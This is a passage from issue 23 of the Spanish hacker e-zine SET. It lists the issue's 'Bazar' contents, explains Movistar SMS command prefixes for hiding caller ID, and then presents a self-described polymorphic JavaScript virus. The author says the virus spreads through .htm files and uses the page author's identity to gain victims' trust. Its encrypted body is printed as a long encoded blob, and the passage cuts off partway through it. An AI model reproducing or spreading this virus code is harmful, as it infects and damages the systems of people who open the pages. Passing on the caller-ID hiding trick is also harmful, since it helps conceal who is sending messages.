-[ 0x03 ]--------------------------------------------------------------------
-[ Bazar ]-------------------------------------------------------------------
-[ by Varios Autores ]------------------------------------------------SET-23-



                 #$""#.
                 $.  ,#
                 :# ##'    .,,.     ,.###:.     ,,     '#,:#$#.
                 #$  "#;  .#  #;       ,;#'   .#  #;     :#     
                 $.  ,#   #'  '#     ,#'      #'  '#     $#
                ,:###'    "#,,$#,.  ,#$#;:'`  "#,,$#,.  ,:'

                
                                               - [ SET #23 ] -

   Barato, barato, reina.
   De vuelta con el bazar, lleno de articulos cortos, opiniones
   personales, trucos variopintos y toda clase de extra~as maravillas.
                   
   El recuerdo de rigor para los que se saltan el articulo 0x07.

   -  80 columnas
   -  Temas novedosos, interesantes, originales o al menos coherentes
   -  Sin faltas. Vive el verano.
            

                -{  Contenidos del Bazar de SET #23 }-


 0x01 - Preprocesado SMS de Movistar                        < Krip7ik
 0x02 - Virus de nuestro tiempo                             < PL480
 0x03 - Kontra el Sistema		                    < _MeNpH_
 0x04 - Movidas en GIMP                                     < TryckY
 0x05 - Videoklub: Pasion por el cine                       < ^pRoviDoR
 0x06 - El Arte de la Ingenieria Social II                  < Tahum
 0x07 - Er Pako Underground                                 < SET Staff
 0x08 - Ascii rules                                         < RagPutana
 0x09 - Como ganar a las siete y media                      < Hendrix
 0x0A - BookMarks                                           < SET Staff





-< 0x01 >-------------------------------------------------.-------------.----
                                                          `-[ Krip7ik )-


	   ________________________________________________
	-:=| Comandos de preprocesado en SMS con Vomistar |=:-
	   ------------------------------------------------

By Krip7iK


Bien, hace poco me llego un rumor de ciertos comandos para enviar mensajes
cortos con acuse de recibo, con ocultacion del numero emisor del mensaje
(CID), y ... envio *GRATUITO*...

Pues nada me puse a investigarlo y saque lo siguiente en claro:

Se trata de insertar una serie de comandos antes del SMS en si (antes del
texto); la sintaxis que se usa es la siguiente:

*X*X*X*X*#

Donde las X son los comandos. Esto es: se abre el dialogo de comandos con
un * , luego mediante una letra (en donde esta la X) se especifica el
comando en cuestion, si quieres enviar mas de un comando estos van
separados por * entre si, y finalmente se cierra el dialogo de comandos
con una #.

Los comandos que hemos descubierto y comprobado son los siguientes dos:

o => Ocultacion de identidad (oculta CID)

n => acuse de recibo (te envia un SMS el centro receptor del mensaje, no
el terminal receptor, sino el Centro que usa el terminal receptor,
diciendo que el mensaje que enviaste a la hora tal del dia cual ha sido
recibido por No. a la hora tal del dia cual.)

El comando de envio gratuito que llego a mis oidos es con la letra "u",
pero por la simple prueba que realice (intento de envio con una SIM sin
credito) no debe funcionar, o al menos.. no es la "u" el comando... Lo que
no quiere decir que no exista algun comando que lo permita.

CONCLUSION: 

	El centro de envio de mensajes tiene en su software algun tipo
de preprocesador del SMS que busca una cierta sintaxis de comandos (la ya
expuesta) y actua en consecuencia.

	Ya conocemos dos comandos validos, y nada nos hace pensar que no
existan mas, asi que todos aquellos con tiempo, ganas .. y credito
suficiente podeis intentar descubrir nuevos comandos.

NOTA FINAL: si se abre un dialogo de comandos con * y no se acaba de
cerrar con la consiguiente #, el receptor recibe un mensaje totalmente en
blanco y habreis perdido esas maravillosas 20 pelas... asi que no os
olvideis de la # y no os confundais con los * !!!.

-= Todas las pruebas realizadas han sido hechas con tarjetas Movistar
Activa (diversos tipos: 4, joven...), no se han realizado pruebas por el
momento con Airtel ni con terminales de contrato. Eso si.. se ha probado a
enviar a diferentes compa~ias con exito en todas ellas =-

                     



-< 0x02 >------------------------------------------.-------------------.-----
                                                    `-[ PL480 )-


Como se ha puesto de moda esto de los virus en javascript, pos no iba
yo a ser menos, y ahi va eso... prefiero que se publique en SET para
que no se me pueda acusar de provocar da~os...

  Me parece ironico que en la historia de la love letter sea el pobre
chaval quien pague por las burradas que permiten hacer los programas
de Moco$oft.

 Los da~os no los provocan los escritores de virus, sino los sistemas 
que permiten la ejecucion de sus codigos.

Confieso que me decidi a terminar el virus tras ver el codigo de love-letter, 
con la intencion de hacer algo un poco mas limpio (menos virulento y menos
destructivo) y evolucionado: por lo menos cifra el codigo, y es 
primitivamente polimorfico.
No he utilizado la "novedosa" teknika del outlook, porque es de esperar que 
dure poco una funcionalidad que permite el spam...
Me parecio mas eficaz una contaminacion lenta mediante archivos htm...
 
Tiene el interes de utilizar la identidad del escritor de la pagina
para adquirir la confianza de la victima...

					PL480.


Nada, que ultimamente me ha dao por empaquetar y
encapsularlo todo... para evitar "accidentes".

Me parecio curioso utilizar los comentarios para
insertar codigo, imagenes, troyanos...

<++>script/pl480.htm

/* Importante: no insertar saltos de linea...*/

function =
pl480(){/*BBHBFBCHCCKBCJBCDHBECBBCBBHBJKBCCCBBCCDCDHBECBBCBIHBCCCBBCCBCJG=
BDEBCGBJFBGFBEGBGFBBGBJFBJFBJFBDEBDEBIHBFCCCBCBBCGBCHCCGCCJGBDEBBJBHIBDGB=
HGBJFBDEBECBBCBBHBDCCFCCCBCDHBECBBCBDEBDEBDEBJHBEIBEJBIHBHIBGHBIIBKHBDJBJ=
GBDEBBIBKIBDJBDEBKHBJHBGJBIHBGHBFJBEIBKIBJIBGHBHIBDEBBJBGJBDJBBJBKIBEJBKH=
BDEBKIBJIBHIBKJBJGBDEBECBBCBKBBECBBCBDEBJHBKIBJIBKEBFJBDEBDJBGJBJIBDEBFJB=
DIBEIBEJBDEBIHBKIBJHBKHBHFBHFBHFBDEBIIBIKBIBCCBCDEBIKBDEBJKBCBCHCCHCCCBCF=
CCDEBCCCBCCCBCEEBEEBEEBDEBJGBCFBECBBCBDEBDEBHCCFBCIKBBCCIBCGCCDEBHCCCCCDE=
BEJBKHBFJBFFBCIBICCBCCGBCBCCGCCIBCGBCFFBGHBBGBIGBFFBCBCGFBCIBCBCBCCHFBHFB=
HFBECBBCBDEBDEBDEBGHBBCCBBCDEBIIBHEBDEBDBCCCCFCCDEBHCCFBCCBCDEBFIBEJBKKBF=
CCGBCDCCHCCDEBFEBIJBEJBFBCDEBJCCGBCFCCICCGCCDEBHCCICCHCCCCCFCCGBCIKBJBCFE=
BECBBCBDEBDEBDEBHCCFBCIKBHCCDEBKKBCCCKBCCBCGCCDEBKCCGBCHCCFBCDEBIJBEJBFBC=
CBCJBCJBCHFBHFBHFBDEBECBBCBKBBJIBCCCKCCDEBIIBHEBIJBGBCBCCBBCCCCKCCGCCDEBG=
BCGCCDEBFBCIKBKKBIBCCBCFCCDEBDBCFCCGBCCBCBCCBBCJBCCDCJGBDEBECBBCBKBBIJBFB=
CCBCFCCCBCDEBCDCCCCICCDEBKCCIKBBCCHCCDEBHCCCCCDEBCBCBCCHCCCBCFCCDEBHCCCCC=
BBCIKBCDCEHBDEBKGBCFBECBBCBKBBDEBDEBECBBCBGFBGFBGFBGFBGFBGFBGFBGFBGFBGFBG=
FBGFBGFBGFBGFBGFBGFBGFBGFBGFBGFBGFBGFBGFBGFBGFBGFBGFBGFBGFBGFBGFBGFBGFBGF=
BGFBGFBGFBGFBGFBGFBECBBCBDEBDEBDEBJHBCBCGCCKKBFCCGBCDCCKKBGBCCCCBCCJGBECB=
BCBECBBCBKHBGCCDEBICCBCCDEBKKBCCCBBCGBCEBCCCCDEBJKBIKBGCCHCCIKBBCCHCCCBCD=
EBFCCCBCBBCICCBCCBBCIKBBCCHCCCBCDEBCDCDEBBBCCBCGCCCCCFCCEBCIKBBCCGBCDDCIK=
BBBCCCCFFBECBBCBDEBCDCIKBDEBECCICCCBCDEBFBCCBCDEBGBCBBCCCCDEBIKBCFDIKBBBC=
GBCCBCBCCBBCCCCJBCCBCDEBDBCICCBCCKKBGBCCCCBCCIKBJBCGBCBBCIKBBBCDEBKBCGBCC=
BCBCCHCCFCCIKBGCCDEBECBBCBGBCBCCJCCCBCGCCHCCGBCEBCIKBJKBIKBDEBJBCIKBDEBIK=
BCDCICCBBCIKBDEBBBCCBCDEBIIBHEBHFBHFBHFBECBBCBIHBCCCBCCDEBJBCCCCDEBKKBICC=
IKBJBCDEBECCICCGBCCBCFCCCCCDEBBBCCBCHBCIKBFCCDEBKKBJBCIKBFCCCCCDEBECCICCC=
BCDEBCBCGCCHCCCBCDEBKKBCCCBBCGBCEBCCCCDEBBCCCCCDEBCBCGCCDEBECBBCBCBCHBCCB=
CKBCDCCJBCIKBFCCFFBDEBECCICCCBCDEBCBCGCCDEBJKBIKBGCCGBCKKBIKBKBCCBCBCCHCC=
CBCDEBICCBCCDEBCBCBCCGCCIKBKBCJKBJBCIKBBBCCCCDEBBBCCBCDEBECBBCBIKBJBCEBCI=
CCBCCCCCGCCDEBDBCFCCIKBEBCKBCCBCBCCHCCCCCGCCDEBBBCCBCDEBJBCCCCGCCDEBDBCGB=
CKKBFBCCBCFCCCCCGCCDEBBBCCBCDEBIKBCDCICCBBCIKBDEBBFBKEBIJBGCCFBCHFBKKBFBC=
KBCKEBDEBCDCECBBCBKEBFIBGCCKKBFCCGBCDCCHCCEGBHFBKKBFBCKBCKEBFFBDEBECCICCC=
BCDEBJCCGBCCBCBCCCBCBCCDEBKKBCCCBCCDEBCBCJBCDEBIJBBGBGIBCFBCDCDEBECCICCCB=
CDEBFBCIKBDEBGCCGBCBBCCCCECBBCBCBCGCCKKBFCCGBCHCCCCCDEBKKBCCCBCCDEBDBCGBC=
BCCCBCGCCDEBCBCBDCKKBICCGCCGBCJCCIKBKBCCBCBCCHCCCBCDEBCBCBBCICCKKBIKBHCCG=
BCJCCCCCGCCJGBDEBBHBHHBGJBFJBFJBKIBJIBDEBECBBCBCCCBCCKKBJBCGBCKKBIBCCHBFE=
BBBCCCCKKBICCKBCCBCBCCHCCHFBIKBJBCJBCHFBHCCCBCBDCHCCCCCGHBHFBJCCIKBJBCICC=
CBCCHBBJBHIBDGBHGBJFBDEBEFBDEBEIBBCCDBCCBCKKBHCCKGBBBCCCCKKBICCKBCCBCBCCH=
CCHFBIKBJBCJBCHFBHCCCBCBDCHCCCCCHFBGCCHCCCDCJBCCBCHFBBBCGBCGCCDCCJBCIKBCD=
CCHBKEBKEBFEBDHBDEBJCCCBCFCCDEBKKBCCCBBCGBCEBCCCCDEBBHBIFBJKBICCHCCHCCCCC=
BCCDHBECBBCBDEBDEBDEBDEBDEBIHBCCCKBCCCCDEBJBCCCCGCCDEBHIBKHBCIBKIBJGBDEBJ=
BCCCCDEBBBCGBCJCCCBCFCCHCCGBCBBCCCCDEBCBCGCCDEBCBCBCCGCCIKBKBCJKBJBCIKBFC=
CHFBECBBCBECBBCBBHBBBCGBCJCCDEBGBCBBCCHBFEBHCCCBCBDCHCCCCCFEBDEBGCCHCCCDC=
JBCCBCCHBFEBBBCGBCGCCDCCJBCIKBCDCJGBKEBBCCCCCBCCCBCKEBFEBDHBECBBCBBHBHCCC=
BCBDCHCCIKBFCCCBCIKBDEBBCCIKBKBCCBCCHBFEBHCCCBCBDCHCCCCCGHBFEBDEBFCCCCCKC=
CGCCCHBFEBBGBJFBFEBDEBKKBCCCJBCGCCCHBFEBHGBJFBFEBDEBDHBBHBIFBHCCCBCBDCHCC=
IKBFCCCBCIKBDHBECBBCBBHBIFBBBCGBCJCCDHBECBBCBDEBEIBBCCDBCCBCKKBHCCIKBDEBJ=
BCCCCGCCDEBDBCGBCKKBFBCCBCFCCCCCGCCDEBHFBFBCHCCKBCDEBBBCCBCJBCDEBCBCGCCKK=
BFCCGBCHCCCCCFCCGBCCCCDEBBFBCDCDEBGCCICCJKBKKBIKBFCCDCCCBCHCCIKBGCCCFBECB=
BCBKKBCCCBCCDEBICCBCCIKBDEBKKBCCCDCCGBCIKBDEBJKBICCFCCBBCIKBKBCCBCBCCHCCC=
BCDEBKKBGBCDBCFCCIKBBBCIKBDEBDCCIKBFCCIKBDEBBBCCCCHCCIKBFCCDEBIKBJBCDEBKK=
BCCCBBCGBCEBCCCCDEBBBCCBCECBBCBICCBCCDEBDCCCBCICCBBCCCCGFBDCCCCCJBCGBCKBC=
CCCFCCDBCGBCGCCKBCCCCHFBECBBCBIHBICCIKBBCCBBCCCCDEBGCCCBCDEBCBCHBCCBCKKBI=
CCHCCIKBDEBCBCJBCDEBKKBCCCBBCGBCEBCCCCDEBFBCHCCKBCJBCFFBDEBKBCCCCBBCGBCDB=
CGBCKKBIKBDEBCBCJBCDEBFCCCBCEBCGBCGCCHCCFCCCCCECBBCBDCCIKBFCCIKBDEBGCCCBC=
FCCDEBGBCBCCGBCKKBGBCIKBBBCCCCDEBIKBJBCDEBIKBFCCFCCIKBBCCECCICCCBCDEBBBCC=
BCJBCDEBKCCBGBHFBECBBCBGHBBBCCBCKBCIKBGCCDEBJHBCBCHBCIKBDEBICCBCCIKBDEBFC=
CICCHCCGBCBCCIKBDEBFCCCBCGCCGBCBBCCBCBCCHCCCBCDEBFEBICCGCCICCIKBFCCGBCCCC=
HFBHBCGCCFEBDEBECCICCCBCECBBCBECCICCCBCDEBJBCIKBBCCDDCIKBDEBCBCGCCDCCCCCF=
CCIKBBBCGBCKKBIKBKBCCBCBCCHCCCBCDEBJBCIKBDEBFCCICCHCCGBCBCCIKBDEBBBCCBCDE=
BGBCBCCDBCCBCKKBKKBGBCCCCBCCECBBCBCBCBCCDEBICCBCCDEBIKBFCCKKBFBCGBCJCCCCC=
DEBHCCCBCKBCDCCCCCFCCIKBJBCHFBHFBHFBECBBCBECBBCBBJBIKBFCCIKBDEBCBCJCCGBCH=
CCIKBFCCDEBFCCCBCGBCBCCDBCCBCKKBHCCIKBFCCDEBBGBDEBJCCCBCKKBCBCGCCDEBCBCJB=
CDEBKBCGBCGCCKBCCCCDEBDBCGBCKKBFBCCBCFCCCCCFFBECBBCBDBCGBCFCCKBCIKBDEBKKB=
CCCBCCDEBCBCJBCDEBBCCCCCKBCJKBFCCCBCDEBBBCCBCDEBICCGCCICCIKBFCCGBCCCCDEBB=
BCCBCJBCDEBCCCFCCBBCCBCBCCIKBBBCCCCFCCHFBHFBHFBECBBCBDCCCCCFCCDEBJBCCCCDE=
BHCCIKBBCCHCCCCCFFBDEBCBCJBCDEBECCICCCBCDEBCBCHBCCBCKKBICCHCCCBCDEBCBCJBC=
DEBJCCGBCFCCICCGCCFFBDEBBBCCBCHBCIKBFCCIKBDEBECBBCBGBCBCCCBCJCCGBCHCCIKBJ=
KBJBCCBCKBCCBCBCCHCCCBCDEBGCCICCDEBFBCICCCBCJBCJBCIKBDEBCBCBCCDEBCBCJBCDE=
BKKBCCCBBCGBCEBCCCCHFBHFBHFBECBBCBGHBBBCCBCKBCIKBGCCDEBDCCCCCGCCGBCJKBGBC=
JBCGBCHCCIKBDEBJBCIKBDEBGBCBCCDBCCBCKKBKKBGBCCCCBCCDEBDCCCCCFCCDEBJCCIKBF=
CCGBCIKBGCCDEBJCCIKBFCCGBCIKBBCCHCCCBCGCCECBBCBGCCGBCKBCICCJBCHCCIKBBCCCB=
CIKBKBCCBCBCCHCCCBCHFBHFBHFBDEBECBBCBECBBCBDIBCBCDEBGBCBCCHCCCBCBCCHCCIKB=
BBCCCCDEBFBCIKBKKBCBCFCCDEBICCBCCDEBKKBCCCBBCGBCEBCCCCDEBJBCCCCDEBKBCCBCB=
CCCCCGCCDEBBBCIKBCFDGBCBCCCCCDEBDCCCCCGCCGBCJKBJBCCBCFFBDEBCDCIKBECBBCBEC=
CICCCBCDEBBCCCCCDEBDCCFCCCCCJCCCCCKKBIKBDEBBBCIKBCFDCCCGCCDEBGBCFCCFCCCBC=
DCCIKBFCCIKBJKBJBCCBCGCCJGBECBBCBDEBJKBIKBGCCHCCIKBDEBKKBCCCBCCDEBJKBCCCF=
CCFCCIKBFCCDEBJBCIKBDEBKKBJBCIKBJCCCBCDEBCBCBCCDEBDJBICCBCCKIBBCCKKBCBCKH=
BBDCDEBCDCDEBCBCJBCECBBCBDEBDBCGBCKKBFBCCBCFCCCCCDEBKKBCCCFCCFCCCBCGCCDCC=
CCCBCCBBCGBCCBCBCCHCCCBCJGBDEBFEBBCCCCCKBCJKBFCCCBCDEBBBCCBCDEBICCGCCICCI=
KBFCCGBCCCCHFBHBCGCCFEBFFBECBBCBDEBIKBBBCCBCKBCIKBGCCDEBBBCCBCDEBJBCGBCKB=
CDCCGBCIKBFCCDEBHCCCCCBBCCCCGCCDEBJBCCCCGCCDEBIKBFCCKKBFBCGBCJCCCCCGCCDEB=
FBCHCCKBCDEBBBCCBCJBCECBBCBDEBCBCGCCKKBFCCGBCHCCCCCFCCGBCCCCHFBHFBHFBECBB=
CBECBBCBDEBDEBGCCGBCDEBBBCCBCDEBHCCCCCBBCIKBGCCDEBDBCCCCFCCKBCIKBGCCDEBKK=
BFCCCBCCBCGCCDEBCBCBCCDEBJBCIKBDEBBCCCBCKKBCBCGCCGBCBBCIKBBBCECBBCBDEBDEB=
BBCCBCDEBDBCCCCKBCCBCBCCHCCIKBFCCDEBJBCIKBDEBJKBGBCCCCBBCGBCJCCCBCFCCGCCG=
BCBBCIKBBBCHFBHFBHFBDEBBHBJKBICCHCCHCCCCCBCCDEBCCCBCCKKBJBCGBCKKBIBCCHBFE=
BBJBHIBDGBHGBJFBBFBCFBFEBDHBGFBGFBGFBDEBBJBHIBDGBHGBJFBDEBGFBGFBGFBBHBIFB=
JKBICCHCCHCCCCCBCCDHBECBBCBECBBCBBHBIFBDCCFCCCBCDHBECBBCBECBBCBBHBIFBJKBC=
CCBBCCDCDHBECBBCBBHBIFBFBCHCCKBCJBCDHBECBBCBECBBCBECBBCBECBBCBECBBCBECBBC=
BECBBCBECBBCBECBBCBECBBCBECBBCBECBBCBECBBCBECBBCBECBBCBECBBCBECBBCBECBBCB=
ECBBCBECBBCBECBBCBECBBCBECBBCBECBBCBECBBCBECBBCBECBBCBECBBCBECBBCBBHBEJBI=
HBDJBEIBBJBFJBDHBECBBCBDBCICCBCCKKBHCCGBCCCCBCCDEBBJBHIBDGBHGBJFBBFBCFBED=
CECBBCBECBBCBIFBDFBDEBIHBCCCBBCCBCJGBDEBCGBJFBGFBEGBGFBBGBJFBJFBJFBDEBDEB=
IHBFCCCBCBBCGBCHCCGCCJGBDEBBJBHIBDGBHGBJFBDEBECBBCBDEBJHBKIBJIBKEBFJBDEBD=
JBGJBJIBDEBFJBDIBEIBEJBDEBIHBKIBJHBKHBHFBHFBHFBDEBIIBIKBIBCCBCDEBIKBDEBJK=
BCBCHCCHCCCBCFCCDEBCCCBCCCBCEEBEEBEEBDEBJGBCFBECBBCBDFBIFBECBBCBJCCIKBFCC=
DEBFJBCBCKBCDCCCCCFCCIKBFCCCDCBIBCCCJBCBBCCBCFCCCHBBGBKGBECBBCBJCCIKBFCCD=
EBCCCJKBHBCJIBCBCHCCDEBCHBDEBBCCCBCKCCDEBGHBKKBHCCGBCJCCCBCJJBKIBJKBHBCCB=
CKKBHCCBFBFEBIJBEJBKKBFCCGBCDCCHCCHFBJIBCBCHCCKCCCCCFCCIBCFEBCFBECBBCBJCC=
IKBFCCDEBKKBFCCCDCDEBCHBDEBBCCCBCKCCDEBEJBHCCFCCGBCBCCEBCBFBDEBEIBBCCDBCC=
BCKKBHCCDEBEFBDEBBJBHIBDGBHGBJFBDEBEFBDEBFEBBJBHIBDGBHGBJFBBFBCFBKGBFEBCF=
BKGBECBBCBJCCIKBFCCDEBFCCBCCBBCDEBCHBDEBIIBIKBHCCFBCHFBFCCCCCICCBCCBBCBFB=
IIBIKBHCCFBCHFBFCCIKBBCCBBCCCCKBCBFBCFBDEBDFBDEBKFBJFBJFBJFBCFBKGBECBBCBJ=
CCIKBFCCDEBIBCDEBCHBIIBIKBHCCFBCHFBFCCCCCICCBCCBBCBFBIIBIKBHCCFBCHFBFCCIK=
BBCCBBCCCCKBCBFBCFBDEBDFBDEBBGBJFBCFBDEBEFBDEBFGBEGBKGBECBBCBJCCIKBFCCDEB=
BCCDEBCHBDEBEJBHCCFCCGBCBCCEBCHFBDBCFCCCCCKBCIHBFBCIKBFCCIHBCCCBBCCBCBFBI=
BCFFBIBCDEBEFBDEBKFBFFBIBCDEBEFBDEBBGBFFBIBCEFBCGBFFBIBCEFBDGBCFBKGBECBBC=
BECBBCBDEBJCCIKBFCCDEBDCCCCCJBCCDCDEBCHBBCCCBCKCCDEBEJBHCCFCCGBCBCCEBCBFB=
FEBDBCICCBCCKKBHCCGBCCCCBCCDEBBJBFEBDEBEFBDEBFCCBCCBBCDEBEFBDEBFEBBFBCFBE=
DCJCCIKBFCCDEBFEBEFBDEBBCCHFBKKBFBCIKBFCCGHBHCCBFBJFBCFBDEBEFBFEBCHBFEBDE=
BEFBDEBIBCDEBEFBFEBKGBFEBCFBKGBECBBCBDEBDCCCCCJBCCDCDEBEFBCHBDEBFEBJCCIKB=
FCCDEBFEBEFBDEBBCCHFBKKBFBCIKBFCCGHBHCCBFBKFBCFBDEBEFBFEBDEBCHBDEBBCCCBCK=
CCDEBGHBFCCFCCIKBCDCBFBFEBKGBECBBCBDEBDBCCCCFCCDEBBFBJCCIKBFCCDEBGBCCHBJF=
BKGBGBCBHBKKBFCCCDCHFBJBCCBCBCCEBCHCCFBCDEBGFBDEBKFBKGBGBCEFBEFBCFBEDCDEB=
DCCCCCJBCCDCDEBEFBCHBDEBBFBKKBFCCCDCHFBKKBFBCIKBFCCIHBCCCBBCCBCGHBHCCBFBG=
BCCFBDEBEFBDEBIBCCFBDEBEFBDEBFEBFFBFEBKGBGDCDEBDEBECBBCBDEBDCCCCCJBCCDCDE=
BEFBCHBBFBKKBFCCCDCHFBKKBFBCIKBFCCIHBCCCBBCCBCGHBHCCBFBGBCCFBDEBEFBDEBIBC=
CFBEFBFEBCFBKGBFEBKGBECBBCBECBBCBKKBFCCCDCDEBCHBDEBFEBDBCGCCCCCDEBCHBDEBB=
CCCBCKCCDEBGHBKKBHCCGBCJCCCBCJJBKIBJKBHBCCBCKKBHCCBFBKEBEJBKKBFCCGBCDCCHC=
CGBCBCCEBCHFBBIBGBCJBCCBCEJBCDCGCCHCCCBCKBCKIBJKBHBCCBCKKBHCCKEBCFBKGBFEB=
ECBBCBKKBFCCCDCDEBEFBCHBDEBFEBGBCDBCDEBBFBDBCGCCCCCEEBCHBBCCICCJBCJBCCFBE=
DCFEBKGBECBBCBKKBFCCCDCDEBEFBCHBDEBFEBJCCIKBFCCDEBGCCCDCGCCDEBCHBDEBDBCGC=
CCCCHFBCIBCBCHCCBIBCCCJBCBBCCBCFCCBFBDBCGCCCCCHFBCIBCBCHCCEJBDCCCBCKKBGBC=
IKBJBCBIBCCCJBCBBCCBCFCCBFBJFBCFBCFBKGBFEBKGBECBBCBECBBCBKKBFCCCDCDEBEFBC=
HBDEBFEBGBCDBCDEBBFBEEBDBCGCCCCCHFBBIBGBCJBCCBCKHBBDCGBCGCCHCCGCCBFBKEBFE=
BEFBDEBCCCJKBHBCJIBCBCHCCHFBGJBGCCCBCFCCJIBIKBKBCCBCDEBEFBFEBHFBHBCGCCKEB=
CFBCFBEDCFEBKGBECBBCBKKBFCCCDCDEBEFBCHBDEBKEBJCCIKBFCCDEBDBCCHBDBCGCCCCCH=
FBKIBDCCCBCBCCFJBCBCBDCHCCBIBGBCJBCCBCBFBGCCCDCGCCDEBEFBDEBFEBIFBIFBKEBEF=
BDEBCCCJKBHBCJIBCBCHCCHFBGJBGCCCBCFCCJIBIKBKBCCBCDEBEFBKEBHFBHBCGCCFEBDEB=
FFBBGBFFBHCCFCCICCCBCCFBKGBKEBKGBECBBCBKKBFCCCDCDEBEFBCHBDEBFEBDBCHFBIJBF=
CCGBCHCCCBCBFBKEBDBCICCBCCKKBHCCGBCCCCBCCDEBBJBFEBDEBEFBDEBFCCBCCBBCDEBEF=
BDEBFEBBFBCFBEDCJCCIKBFCCDEBFEBEFBDEBBCCHFBKKBFBCIKBFCCGHBHCCBFBJFBCFBDEB=
EFBFEBCHBFEBDEBEFBDEBIBCDEBEFBFEBKGBJCCIKBFCCDEBFEBEFBDEBBCCHFBKKBFBCIKBF=
CCGHBHCCBFBKFBCFBDEBEFBFEBDEBCHBDEBBCCCBCKCCDEBGHBFCCFCCIKBCDCBFBKEBCFBKG=
BFEBKGBECBBCBKKBFCCCDCDEBEFBCHBDEBFEBDBCCCCFCCDEBBFBJCCIKBFCCDEBFEBEFBDEB=
BCCHFBKKBFBCIKBFCCGHBHCCBFBCGBCFBDEBEFBFEBCHBJFBKGBFEBEFBDEBBCCHFBKKBFBCI=
KBFCCGHBHCCBFBCGBCFBDEBEFBFEBBHBFEBEFBDEBBCCHFBKKBFBCIKBFCCGHBHCCBFBKFBCF=
BDEBEFBFEBHFBJBCCBCBCCEBCHCCFBCDEBGFBKFBKGBFEBEFBDEBBCCHFBKKBFBCIKBFCCGHB=
HCCBFBCGBCFBDEBEFBFEBEFBEFBCFBEDCDEBFEBKGBECBBCBKKBFCCCDCDEBEFBCHBDEBFEBD=
BCHFBIJBFCCGBCHCCCBCBFBFEBEFBBCCHFBKKBFBCIKBFCCGHBHCCBFBKFBCFBDEBEFBFEBCK=
BFEBEFBDEBBCCHFBKKBFBCIKBFCCGHBHCCBFBCGBCFBDEBEFBFEBEKBEFBKEBFFBDEBKEBCFB=
GDCKGBFEBKGBECBBCBKKBFCCCDCDEBEFBCHBDEBFEBDBCHFBIJBFCCGBCHCCCBCBFBFEBEFBB=
CCHFBKKBFBCIKBFCCGHBHCCBFBKFBCFBDEBEFBFEBCKBFEBEFBDEBBCCHFBKKBFBCIKBFCCGH=
BHCCBFBCGBCFBDEBEFBFEBEKBEFBDEBKEBCFBKGBKEBCFBKGBFEBKGBECBBCBKKBFCCCDCDEB=
EFBCHBDEBFEBDBCHFBIJBFCCGBCHCCCBCBFBKEBJCCIKBFCCDEBFEBEFBDEBBCCHFBKKBFBCI=
KBFCCGHBHCCBFBBGBCFBDEBEFBFEBCHBDKBFEBDKBFEBKGBDBCCCCFCCDEBBFBJCCIKBFCCDE=
BFEBEFBDEBBCCHFBKKBFBCIKBFCCGHBHCCBFBCGBCFBDEBEFBFEBCHBJFBKGBFEBEFBDEBBCC=
HFBKKBFBCIKBFCCGHBHCCBFBCGBCFBDEBEFBFEBBHBFEBEFBDEBBCCHFBKKBFBCIKBFCCGHBH=
CCBFBKFBCFBDEBEFBFEBHFBJBCCBCBCCEBCHCCFBCKGBFEBEFBDEBBCCHFBKKBFBCIKBFCCGH=
BHCCBFBCGBCFBDEBEFBFEBEFBEFBCFBEDCDEBFEBEFBDEBBCCHFBKKBFBCIKBFCCGHBHCCBFB=
BGBCFBDEBEFBFEBDEBEFBCHBDEBEJBHCCFCCGBCBCCEBCHFBDBCFCCCCCKBCIHBFBCIKBFCCI=
HBCCCBBCCBCBFBFEBEFBDEBBCCHFBKKBFBCIKBFCCGHBHCCBFBKFBCFBDEBEFBFEBCKBFEBEF=
BDEBBCCHFBKKBFBCIKBFCCGHBHCCBFBCGBCFBDEBEFBFEBEKBGFBFEBEFBDEBBCCHFBKKBFBC=
IKBFCCGHBHCCBFBJFBCFBDEBEFBFEBCFBGDCKGBKEBCFBKGBFEBKGBECBBCBKKBFCCCDCDEBE=
FBCHBDEBFEBDBCHFBIJBFCCGBCHCCCBCBFBKEBJCCIKBFCCDEBDBCGCCCCCDEBCHBDEBBCCCB=
CKCCDEBGHBKKBHCCGBCJCCCBCJJBKIBJKBHBCCBCKKBHCCBFBDKBFEBEJBKKBFCCGBCDCCHCC=
GBCBCCEBCHFBBIBGBCJBCCBCEJBCDCGCCHCCCBCKBCKIBJKBHBCCBCKKBHCCDKBFEBCFBKGBJ=
CCIKBFCCDEBHCCDBCCCCJBCBBCCBCFCCDEBCHBDEBDBCGCCCCCHFBCIBCBCHCCEJBDCCCBCKK=
BGBCIKBJBCBIBCCCJBCBBCCBCFCCBFBBGBCFBKGBKEBCFBKGBFEBKGBECBBCBKKBFCCCDCDEB=
EFBCHBDEBFEBDBCHFBIJBFCCGBCHCCCBCBFBKEBJCCIKBFCCDEBHCCBCCIKBKBCCBCDEBCHBD=
EBDBCGCCCCCHFBCIBCBCHCCFJBCBCKBCDCCJIBIKBKBCCBCBFBCFBKGBKEBCFBKGBFEBKGBEC=
BBCBKKBFCCCDCDEBEFBCHBDEBFEBDBCHFBIJBFCCGBCHCCCBCBFBKEBJCCIKBFCCDEBHCCDBC=
GBCJBCCBCDEBCHBDEBHCCDBCCCCJBCBBCCBCFCCHFBIHBFCCCBCIKBHCCCBCFJBCBCBDCHCCB=
IBGBCJBCCBCBFBHCCBCCIKBKBCCBCDEBEFBDKBFEBHFBHBCGCCDKBFEBCFBKGBKEBCFBKGBFE=
BKGBECBBCBKKBFCCCDCDEBEFBCHBDEBFEBDBCHFBIJBFCCGBCHCCCBCBFBKEBHCCDBCGBCJBC=
CBCHFBIJBFCCGBCHCCCBCBFBFEBEFBDEBBCCHFBKKBFBCIKBFCCGHBHCCBFBBGBCFBDEBEFBF=
EBCFBKGBKEBCFBKGBFEBKGBECBBCBKKBFCCCDCDEBEFBCHBDEBFEBDBCHFBIJBFCCGBCHCCCB=
CBFBKEBHCCDBCGBCJBCCBCHFBIHBJBCCCCGCCCBCBFBCFBKGBKEBCFBKGBFEBKGBECBBCBKKB=
FCCCDCDEBEFBCHBDEBFEBDBCHFBIJBFCCGBCHCCCBCBFBDKBFEBJCCIKBFCCDEBIJBGCCFBCD=
EBCHBDEBBCCCBCKCCDEBGHBKKBHCCGBCJCCCBCJJBKIBJKBHBCCBCKKBHCCBFBKEBIJBEJBKK=
BFCCGBCDCCHCCHFBEJBFBCCBCJBCJBCKEBCFBKGBDKBFEBCFBKGBFEBKGBECBBCBKKBFCCCDC=
DEBEFBCHBDEBFEBDBCHFBIJBFCCGBCHCCCBCBFBKEBIJBGCCFBCHFBDJBICCBCCBFBHCCDBCC=
CCJBCBBCCBCFCCDEBEFBDEBDKBFEBIFBIFBDKBFEBDEBEFBHCCBCCIKBKBCCBCEFBDKBFEBHF=
